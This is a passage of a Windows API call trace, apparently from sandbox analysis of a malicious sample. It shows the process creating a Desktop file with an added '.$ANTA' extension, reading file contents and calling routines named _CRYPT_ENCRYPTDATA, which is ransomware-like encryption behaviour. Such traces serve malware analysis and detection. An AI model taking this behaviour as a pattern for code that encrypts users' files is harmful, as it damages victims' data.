(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0122.606] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0122.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0122.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.606] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\csg8 emhax_r.ots.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0122.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.607] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0122.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0122.607] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.607] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0122.607] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0122.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0122.621] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0122.622] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x8f2b, lpOverlapped=0x0) returned 1 [0122.623] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0122.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8f2b) returned 0x49aa010 [0122.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8f2b) returned 0x49b2f48 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.631] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8f2b) returned 0x49aa010 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.632] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0122.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0122.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0122.632] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0122.632] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0122.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0122.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8f2b) returned 0x49aa010 [0122.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8f2b) returned 0x49bbe80 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0122.634] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0122.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0122.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0122.634] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0122.634] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0122.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0122.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0122.635] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0122.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.635] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0122.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 